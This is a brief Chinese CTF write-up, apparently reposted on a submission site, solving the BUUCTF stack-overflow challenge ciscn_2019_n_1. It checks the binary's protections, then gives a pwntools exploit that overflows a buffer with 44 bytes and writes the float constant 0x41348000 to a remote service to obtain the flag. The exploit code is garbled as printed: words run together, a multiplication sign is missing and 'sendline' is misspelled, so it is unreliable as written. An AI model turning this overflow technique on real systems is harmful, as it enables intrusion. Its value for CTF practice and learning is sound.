buu ciscn_2019_n_1 1

网友投稿 258 2022-10-22


buu ciscn_2019_n_1 1

栈溢出

预先步骤

检查文件格式(64位elf)checksec 没有任何保护chmod 777 file 开启可执行权限

IDA(64)

编写exp

from pwn importp = remote("ip address",port)payload = 'A'44 + p64(0x41348000)p.senline(payload)p.interactive()

获得flag

补充

1.注意用hex数据填充v2时,要用p64包装一下,不能直接0x413480002.0x41348000就是11.28125的hex表示。


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:「新手必看」苹果Mac一定要学会的快捷键
下一篇:教你如何轻松学会Java快慢指针法
相关文章

 发表评论

暂时没有评论,来抢沙发吧~